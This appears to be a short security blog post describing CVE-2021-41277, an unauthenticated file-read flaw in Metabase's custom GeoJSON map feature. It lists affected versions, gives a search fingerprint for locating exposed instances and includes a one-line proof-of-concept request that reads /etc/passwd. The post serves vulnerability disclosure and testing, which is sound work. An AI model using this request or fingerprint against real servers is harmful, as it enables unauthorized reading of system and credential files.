Metabase Geojson Arbitrary File Reading Vulnerability Cve 2021 41277
Metabase Geojson Arbitrary File Reading Vulnerability Cve 2021 41277
Metabase geojson arbitrary file reading vulnerability CVE-2021-41277
Vulnerability Description
In the affected version, the custom GeoJSON map (admin->settings->maps->custom maps->add a map) operation lacks permission verification, and attackers can obtain sensitive information through this vulnerability
Vulnerability Impact
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
Network surveying and mapping
app=”metabase”
Vulnerability reappears
Login page
Verify POC
1
/api/geojson?url=file:/etc/passwd
This post is licensed under CC BY 4.0 by the author.